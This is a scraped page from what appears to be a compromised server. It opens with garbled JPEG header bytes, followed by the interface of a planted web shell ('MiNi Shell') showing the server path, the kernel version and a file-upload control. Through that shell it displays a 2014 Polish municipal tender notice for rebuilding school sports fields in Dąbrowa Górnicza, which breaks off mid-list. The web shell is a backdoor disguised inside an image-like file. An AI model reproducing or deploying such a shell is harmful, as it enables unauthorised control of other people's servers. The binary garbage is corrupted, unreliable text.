JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140708/147781-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Wykonanie robót dotyczących boisk o nawierzchni poliuretanowej:
ZADANIE A:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia - boisko wielofunkcyjne  na terenie SP NR 3 przy  ul. Mireckiego w Dąbrowie Górniczej
ZADANIE B:
Modernizacja obiektów komunalnych infrastruktury  sportowej w celu propagowania zdrowego stylu życia -  boisko wielofunkcyjne na terenie SP NR 8 przy ul. Krasińskiego 34 w Dąbrowie Górniczej ZADANIE C:(...)ZADANIE D:(...) ZADANIE E(...) ZADANIE F(...)</b><br>
<b>Numer ogłoszenia: 147781 - 2014; data zamieszczenia: 08.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót dotyczących boisk o nawierzchni poliuretanowej:
ZADANIE A:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia - boisko wielofunkcyjne  na terenie SP NR 3 przy  ul. Mireckiego w Dąbrowie Górniczej
ZADANIE B:
Modernizacja obiektów komunalnych infrastruktury  sportowej w celu propagowania zdrowego stylu życia -  boisko wielofunkcyjne na terenie SP NR 8 przy ul. Krasińskiego 34 w Dąbrowie Górniczej ZADANIE C:(...)ZADANIE D:(...) ZADANIE E(...) ZADANIE F(...).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE A:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia - boisko wielofunkcyjne   na terenie SP NR 3 przy ul. Mireckiego w Dąbrowie Górniczej
Przedmiotem zamówienia jest :  Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj.:
Przebudowa istniejącego boiska wielofunkcyjnego o wymiarach 28,00x15,00m z nawierzchnią asfaltową ograniczoną obrzeżami betonowymi 8 x 30 cm, wyposażone w 2 stojaki do koszykówki przewidziane do demontażu. Przebudowa boiska będzie polegała na wykonaniu nowej nawierzchni poliuretanowej, na istniejącym boisku asfaltowym po uprzednim przygotowaniu istniejącej nawierzchni asfaltobetonowej, wykonaniu chodnika wzdłuż boiska oraz wykonaniu piłkochwytów  o wysokości h=6,0 m i wysokości h=4,0 m wraz z wykonaniem dokumentacji projektowej. 
Zagospodarowanie terenu istniejącego boiska obejmuje:
1.boisko wielofunkcyjne o powierzchni 420,00 m2 do gry w piłkę ręczną (mini 
    nożną),piłkę koszykową i piłkę siatkową o nawierzchni syntetycznej 
    poliuretanowej, 
2. piłkochwyty o wysokości h= 4,0 m  i wysokości h= 6,0 m   za bramkami
3. chodnik  z kostki betonowej  gr. 6 cm  o pow. 56,00 m2
4. mała architektura : 6 ławek  parkowych i 3 kosze na śmieci,
5. odwodnienie boiska,
6.zieleń
Parametry techniczne przebudowywanego obiektu. 
boisko wielofunkcyjne; boisko do piłki  ręcznej (mini nożnej) do piłki 
  koszykowej i piłki siatkowej o  wymiarach 28,00 x 15,00 m o nawierzchni 
  syntetycznej poliuretanowej w  kolorze ceglastym, zielonym i żółtym 
   mieszczące w swym obrysie:
-  boisko do piłki  ręcznej (mini nożnej)  o polu gry 26,00 x 14,00 m, boisko 
   wydzielone  liniami szer. 5 cm
- boisko do piłki koszykowej o wymiarach 26,00 x 14,00 m, boisko wydzielone 
  liniami szer. 5 cm
- boisko do siatkówki o wymiarach 9,00 x 18,00 m, boisko wydzielone liniami   
  szer. 5 cm 
piłkochwyty;  na szerokości boiska i wzdłuż jednego dłuższego boku 
    należy  zamontować piłkochwyty o długości 2 x 15 m  i wysokości 6,00 m  
    oraz długości  29,0 m  i wysokości h =  4,00 m, piłkochwyty systemowe 
    z siatki polipropylenowej na słupach stalowych w rozstawie zgodnym 
    z rysunkiem konstrukcyjnym. 
    Słupy stalowe z profilu zamkniętego 80 x 80 x 3 mm, cynkowane
    i malowane  proszkowo. Słupy skrajne rozparte zastrzałami z profilu                 
    60 x 60 x 3 mm. Siatka polipropylenowa o oczkach 10 x10 cm o 
    gr. 4,75 mm koloru zielonego. Siatka rozpięta na linkach stalowych 
     cynkowanych gr. 4 mm.   Słupy  montować  w fundamentach betonowych  
     B - 20  o wymiarach  O 300 x 1100 mm.   
chodnik:  z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej o 
    szer.2,0  m, wzdłuż dłuższego boku boiska wielofunkcyjnego,
ławki parkowe, kosze na śmieci:  w chodniku z kostki betonowej należy  zamontować 6 ławek parkowych bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 3 kosze na śmieci umieszczone między  ławkami. Ławki i kosze montowane na stałe w podłożu.
Odwodnienie:  odwodnienie nawierzchni boisk odbywało się będzie w sposób naturalny poprzez wyprofilowanie spadków płyty boisk rzędu 0,5% ze sprowadzeniem wody na tereny zieleni.
Ukształtowanie terenu: elementy zagospodarowania należy ukształtować w nawiązaniu do istniejącego boiska asfaltowego i terenu otaczającego.
Zieleń: fragmenty terenu wolne od zabudowy  i nawierzchni utwardzonych, a zniszczonych  poprzez prowadzenie  robót budowlanych należy odtworzyć poprzez zazielenienie trawnikami wykonanymi metodą siewu. 
Nawierzchnia boisk: syntetyczna poliuretanowa w kolorze ceglastym, zielonym  i żółtym, linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach: boisko do piłki ręcznej (mini piłki nożnej ) w kolorze białym, boisko do koszykówki w kolorze żółtym, boisko do siatkówki w kolorze niebieskim.
Boiska wyposażone w bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, stojaki do koszykówki o wysięgu 2,20 m i słupki do siatkówki z mechanizmem naciągowym i możliwością regulacji wysokości siatki.
Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych   -   boisko wielofunkcyjne
Stan istniejącej nawierzchni asfaltobetonowej boisk daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii :
- usunąć luźne fragmenty asfaltobetonu z powierzchni podbudowy, rys i spękań,
- istniejące nieliczne ubytki asfaltobetonu uzupełnić betonem B-20 na pełną 
  grubość asfaltobetonu,
- na całej powierzchni wylać płytę betonową z betonu B - 25 o gr. min 10 cm,  
  z odpowiednimi spadkami rzędu 0,5 - 1,0 %, płytę ograniczyć nowymi 
  obrzeżami betonowymi 8 x 30 cm, po uprzednim demontażu starych
- podbudowa betonowa zatarta na ostro, zdylatowana ( zgodnie ze sztuką   
   budowlaną), wysezonowana - wilgotność rzędu 3 - 5 %
Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną   poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty     elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym, zielonym i żółtym.    
Obiekt należy  wyposażyć w następujący sprzęt sportowy :
- dwie bramki do piłki ręcznej o wymiarach 3,00x2,00 m, konstrukcji aluminiowej z profilu 80x80 mm, malowane proszkowo, montowane w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki polietylenowe PE- 4 gł. 0,8/1,0 m ( produkt typowy). Bramki montowane zgodnie z zaleceniami producenta.
- dwa stojaki do koszykówki, stalowe cynkowane, montowane w tulei, o wysięgu 2,20 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach 1,05x1,80 m z obejmą wzmocnioną cynkowaną siatką łańcuszkową.   Stojaki wyposażone w osłony słupów.   Stojaki montowane zgodnie z zaleceniami producenta.
- jeden komplet  słupków do siatkówki, aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0 x1.0 m) w kolorze białym ( produkt typowy ).  Słupki montowane zgodnie z zaleceniami producenta.
ZADANIE B:
Modernizacja obiektów komunalnych infrastruktury sportowej w celu propagowania zdrowego stylu życia - boisko wielofunkcyjne na terenie SP NR 8 przy ul. Krasińskiego 34 w Dąbrowie Górniczej
Przedmiotem zamówienia jest:  Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj; 
Przebudowa istniejącego boiska wielofunkcyjnego o wymiarach 41,00x21,00 m z nawierzchnią asfaltową ( asfalt lany) ograniczoną  obrzeżami betonowymi 8 x 30 cm.  Na trzech bokach  dwóch dłuższych i jednym krótszym boiska znajduje się chodnik z płytek chodnikowych  o szer. 225 cm przewidziany do demontażu. Boisko wielofunkcyjne  wyposażone w stojak do koszykówki i dwie bramki  do piłki ręcznej o konstrukcji stalowej przewidziane do demontażu oraz  piłkochwyt  o konstrukcji stalowej  długości 28,15 m i wysokości h= 4,0 m przewidziany do demontażu. Przebudowa boiska będzie polegała na wykonaniu nowej nawierzchni poliuretanowej, na istniejącym boisku asfaltowym (po uprzednim przygotowaniu istniejącej podbudowy  asfaltowej), wykonaniu chodnika z kostki betonowej  szer. 2,0 m wzdłuż dłuższego  boku boiska od strony budynku szkoły oraz wykonaniu piłkochwytów o wysokości h=6,0 m i h=4,0 m wraz z wykonaniem dokumentacji projektowej. 
Zagospodarowanie terenu istniejącego boiska obejmuje: 
1.boisko wielofunkcyjne o pow. 861,00 m2 do gry w piłkę ręczną (mini nożną) 
  piłkę koszykową i piłkę siatkową o nawierzchni syntetycznej poliuretanowej, 
2. piłkochwyt o wysokości h = 4,0 m i h= 6,0 m za bramkami
3. chodnik z  kostki betonowej   o pow. 82,00 m2
4. mała architektura: 6  ławek parkowych,  2 kosze na śmieci,
5. odwodnienie boiska,
6. zieleń.
Parametry techniczne przebudowywanego obiektu. 
boisko wielofunkcyjne do piłki ręcznej (mini nożnej), piłki koszykowej i piłki  
  siatkowej o wymiarach 41,00 x 21,00 m o nawierzchni syntetycznej 
  poliuretanowej w kolorze  ceglastym,  zielonym i żółtym, mieszczące w swym obrysie:
- boisko do piłki ręcznej ( mini nożnej) o polu gry 38,00 x 20,00 m  
  boisko wydzielone liniami szer. 5 cm 
- dwa boiska do piłki koszykowej o wymiarach 20,00 x 13,00 m  boiska 
  wydzielone liniami szer. 5 cm. 
- dwa boiska do siatkówki o wymiarach 9,00 x 18,00 m, boiska wydzielone liniami  szer. 5 cm.
piłkochwyty;  należy zamontować za bramkami boiska piłko chwyty o długości  2 x 21,00 m i wysokości h= 6,00 m  oraz  wzdłuż boiska  piłko chwyt o długości 38,00 m i wysokości 4,00 m. Piłkochwyty  systemowe  z siatki polipropylenowej na słupach  stalowych   w rozstawie zgodnym z rysunkiem konstrukcyjnym.   Słupy stalowe  z profilu zamkniętego 80 x 80 x 3 mm, cynkowane i malowane proszkowo.   Słupy skrajne rozparte zastrzałami o profilu 60 x 60 x 3 mm.   Siatka polipropylenowa o oczkach 10 x 10 cm o gr. 4,75 mm koloru zielonego.  Siatka rozpięta na linkach stalowych cynkowanych gr. 4 mm. Słupy w fundamentach   betonowych B-20  o wymiarach min.  O 300 x 1100 mm .Wykonawca może zastosować dowolny system piłkochwytów sportowych spełniający w/w założenia. 

chodnik;  z kostki betonowej gr. 6 cm typu Holand na podsypce cementowo piaskowej o szer. 2,0 m, wzdłuż boiska wielofunkcyjnego ograniczony obrzeżami  betonowymi 8 x 30 cm.

ławki parkowe, kosze na śmieci: w chodniku z kostki betonowej należy zamontować  6 ławek parkowych bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 2 kosze na śmieci umieszczone między  ławkami. Ławki i kosze montowane na stałe w podłożu.

Odwodnienie:  odwodnienie nawierzchni boisk odbywało się będzie w sposób naturalny poprzez wyprofilowanie spadków płyty boisk rzędu 0,5% ze sprowadzeniem wody na tereny zieleni.

Ukształtowanie terenu: elementy zagospodarowania należy ukształtować w nawiązaniu do istniejącego boiska asfaltowego i terenu otaczającego.

Zieleń: fragmenty terenu wolne od zabudowy  i nawierzchni utwardzonych, a zniszczonych  poprzez prowadzenie  robót budowlanych należy odtworzyć poprzez zazielenienie trawnikami wykonanymi metodą siewu. 

Nawierzchnia boisk: syntetyczna poliuretanowa w kolorze ceglastym, zielonym  i żółtym, Linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach: boisko do piłki ręcznej (mini piłki nożnej ) w kolorze białym, boisko do koszykówki w kolorze niebieskim , boisko do siatkówki w kolorze żółtym .
Boisko wielofunkcyjne wyposażone w bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, stojaki do koszykówki o wysięgu 1,60 m i słupki do siatkówki z mechanizmem naciągowym i możliwością regulacji wysokości siatki.
 
Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych   -   boisko wielofunkcyjne
 
Stan istniejącej nawierzchni asfaltowej boiska daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
Istniejącą podbudowę asfaltową należy przygotować wg. następującej  technologii :
- usunąć luźne fragmenty asfaltu z powierzchni  podbudowy,  rys,  i spękań,
- istniejące nieliczne ubytki asfaltu uzupełnić betonem B-20 na pełną 
  grubość asfaltobetonu,
- sfrezować istniejącą podbudowę asfaltową na gr. ok. 5 mm, oczyścić 
   przed układaniem kolejnych warstw podbudowy
- na całej powierzchni wylać płytę betonową z betonu B-25   o gr. min 7 cm,     
  z odpowiednimi spadkami rzędu 0,5 %,  płytę ograniczyć nowymi obrzeżami 
   betonowymi 8 x 30 cm, po  uprzednim demontażu starych
- podbudowa betonowa zatarta na ostro, zdylatowana (zgodnie ze sztuka 
   budowlana), wysezonowana - wilgotność rzędu 3-5 %
 
Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną   poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym,  zielonym  i żółtym.   
     
Obiekt należy  wyposażyć w następujący sprzęt sportowy :
 
- dwie bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, konstrukcji stalowej z profilu 80 x 80 mm, cynkowane , montowane w tulejach na stałe wyposażone w siatki polietylenowe PE-4 gł. 0,8/1,0 m (produkt typowy).
Bramki montowane zgodnie z zaleceniami producenta.
 
- cztery stojaki do koszykówki, stalowe cynkowane, montowane w tulei na stałe, o wysięgu 1,60 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach   1,05 x 1,80 m z obejmą wzmocnioną cynkowaną i siatką łańcuszkową (produkt typowy). Stojaki montowane zgodnie z zaleceniami producenta.
 
- dwa komplety słupków do siatkówki, aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0 x 1.0 m) w kolorze białym ( produkt typowy ).  Słupki montowane zgodnie z zaleceniami producenta.
ZADANIE C:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia -  boisko do piłki nożnej, boisko wielofunkcyjne na terenie SP NR 18 ul. Piłsudskiego 73  oraz Boisko do siatkówki w Gołonogu w Dąbrowie Górniczej
Przedmiotem zamówienia jest :   Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj; 
Przebudowa istniejącego boiska; 
- do piłki nożnej o wymiarach 51,20 x 26,70 m z nawierzchnią asfaltową ograniczoną obrzeżami betonowymi , wyposażone w 2 bramki przewidziane do demontażu.
-  wielofunkcyjnego do piłki ręcznej i koszykowej o wymiarach 46,00 x 25,70 m z nawierzchnia asfaltową  ograniczoną obrzeżami betonowymi, wyposażone w 2 bramki i 2 kosze przewidziane do demontażu.
-  do piłki siatkowej  o wymiarach  11,80  x 21,70 m  z nawierzchnia asfaltową .    
   Przebudowa boisk będzie polegała na wykonaniu nowej nawierzchni poliuretanowej, na istniejących boiskach  asfaltowych  po uprzednim przygotowaniu istniejącej nawierzchni asfaltowej, wykonaniu piłkochwytów  dla  boiska do piłki nożnej o wysokości h= 6,00 m,  boiska wielofunkcyjnego o wysokości  h=4,0 m i boiska do piłki siatkowej o wysokości h=4,00 m  wraz z wykonaniem dokumentacji projektowej. 
Zakres opracowania :
 1.boisko do gry w piłkę nożną o pow. 1367,04 m2   nawierzchni syntetycznej poliuretanowej,
 2. boisko wielofunkcyjne o pow. 1182,20 m2  do gry w piłkę ręczną, 
      koszykową i siatkową o  nawierzchni poliuretanowej
3.boisko do piłki siatkowej i badmintona  o pow. 256,06 m2
4.piłkochwyty -  boisko  do piłki nożnej, boisko wielofunkcyjne, boisko do piłki siatkowej  i badmintona   
 5. mała architektura:16  ławek parkowych ,9  koszy na śmieci,
 6. odwodnienie boisk,
 7. zieleń.
Parametry techniczne przebudowywanego obiektu. 
boisko do piłki nożnej o wymiarach 51,20 x 26,70 m o nawierzchni 
   syntetycznej poliuretanowej w kolorze zielonym, żółtym i  ceglastym, 
   mieszczące w  swym obrysie boisko o polu gry 45,20 x 22,70 m, boisko 
   wydzielone liniami  szer. 5 cm  w kolorze białym 
boisko wielofunkcyjne : o wymiarach  25,70 x 46,00  m  o nawierzchni syntetycznej poliuretanowej w kolorze  ceglastym ,  zielonym i żółtym , 
   mieszczące w swym obrysie:
-  boisko do piłki  ręcznej w wym. 40,00 m x 20,00 m, boisko wydzielone 
   liniami  szer. 5 cm w kolorze białym 
- dwa boiska do piłki  koszykowej o   wymiarach 24,00 x 14,00 m , boiska 
   wydzielone liniami  szer. 5 cm w kolorze niebieskim
- dwa boiska do piłki siatkówkowej o wymiarach 9,00 x 18,00 m, boiska 
   wydzielone liniami  szer. 5 cm w kolorze żółtym 
boisko do piłki siatkowej i badmintona;  o wymiarach 21,70 x11,80 m, 
    o nawierzchni  syntetycznej w kolorze ceglastym  i zielonym, mieszczące              
    w swym obrysie boisko   o polu gry w siatkówkę 18,0 x 9,0 m  i  boisko do 
    badmintona 6,10 x 13,40 m, boiska  wydzielone liniami  szer. 5 cm i szer.             
    4 cm w  kolorze żółtym 

Piłkochwyty : należy zamontować piłkochwyty o wys. h=6,0 m przy  boisku do piłki nożnej, 
piłkochwyty o wysokości  h=4,0 m  przy boisku wielofunkcyjnym i boisku do piłki  siatkowej.  Piłkochwyt systemowy z siatki polipropylenowej na słupach stalowych  w   rozstawie zgodnym z rysunkiem konstrukcyjnym.   Słupy stalowe  z profilu zamkniętego 80 x 80 x 3 mm, cynkowane i  malowane proszkowo.   Słupy skrajne rozparte zastrzałami z profilu  zamkniętego 60 x 60 x 3 mm .   Siatka polipropylenowa o oczkach 10x10 cm o gr. 4,75 mm koloru zielonego.   Siatka rozpięta na linkach stalowych cynkowanych gr. 4 mm.   Słupy w  fundamentach   betonowych B-20  O300 x 1100 mm.
 Wykonawca może zastosować dowolny system piłkochwytów sportowych   spełniający w/w założenia. 

 ławki parkowe, kosze na śmieci:  Przy boiskach należy zamontować  16 ławek parkowych bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 9 koszy na śmieci umieszczone między  ławkami. Ławki i kosze montowane na stałe w podłożu .

Odwodnienie:  odwodnienie nawierzchni boisk odbywało się będzie w sposób naturalny poprzez wyprofilowanie spadków płyty boisk rzędu 0,5% ze sprowadzeniem wody na tereny zieleni.

Ukształtowanie terenu: elementy zagospodarowania należy ukształtować w nawiązaniu do istniejących  boisk  asfaltowych  i terenu otaczającego.

Zieleń: fragmenty terenu wolne od zabudowy  i nawierzchni utwardzonych, a zniszczonych  poprzez prowadzenie  robót budowlanych należy odtworzyć poprzez zazielenienie trawnikami wykonanymi metodą siewu. 
 
Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych :
  boisko do piłki nożnej, boisko wielofunkcyjne, boisko do piłki siatkowej
 
Nawierzchnia boisk:  syntetyczna poliuretanowa w kolorze, zielonym, żółtym i ceglastym - linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach: 
Boisko do piłki nożnej  w kolorze białym,  boisko do piłki  ręcznej w kolorze białym, dwa boiska do koszykówki w kolorze niebieskim, dwa boiska do siatkówki w kolorze żółtym. 
Boisko do piłki siatkowej i badmintona - nawierzchnia syntetyczna poliuretanowa w kolorze ceglastym i  zielonym, Linie segregacyjne poszczególnych boisk wydzielone liniami szer. 5 cm i 4 cm  w kolorze żółtym.  

Boisko do piłki nożnej wyposażone w bramki o wymiarach 5,0 x 2,0 m. Boisko wielofunkcyjne wyposażone w bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, stojaki do koszykówki o wysięgu 1,60 m i słupki do siatkówki z mechanizmem naciągowym i możliwością regulacji wysokości siatki.
 
Stan istniejącej nawierzchni asfaltobetonowej boisk daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii :
-  usunąć luźne fragmenty asfaltobetonu z powierzchni  podbudowy i rys 
   spękań,
-  istniejące nieliczne ubytki asfaltobetonu uzupełnić betonem B-20 na pełną 
   grubość asfaltobetonu,
-  w miejscach zaniżeń asfaltobetonu w których obecnie po opadach deszczu 
   tworzą się zastoiny wodne, wyciąć otwory o wymiarach 30 x 30 cm, wypełnić  
   je tłuczniem frakcji  4 - 31,5 mm i odpowiednio zagęścić do stopnia 0,98,
-  zagruntować przygotowaną podbudowę preparatem szczepnym poliuretanowym,
- wyrównać miejsca zaniżeń i wyprofilować właściwe spadki warstwa z 
   kompozytu poliuretanowego stanowiącego mieszankę kruszywa 
   mineralnego (żwirku suszonego), granulatu gumowego i kleju poliuretanowego.
 
Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną   poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym, zielonym i żółtym.
Obiekt należy  wyposażyć w następujący sprzęt sportowy :
- dwie bramki do piłki nożnej o wymiarach 5,0x2,0 m, konstrukcji aluminiowej, malowane proszkowo, montowane w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki polietylenowe PE-4 gł. 0,8/1,0 m ( produkt typowy ).
Bramki montowane zgodnie z zaleceniami producenta. 
- dwie bramki do piłki ręcznej o wymiarach 3,00x2,00 m, konstrukcji stalowej z profilu 80x80 mm, malowane proszkowo, montowane w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki polietylenowe PE-4 gł. 0,8/1,0 m ( produkt typowy ).Bramki montowane zgodnie z zaleceniami producenta.
- cztery stojaki do koszykówki, stalowe cynkowane, montowane w tulei,
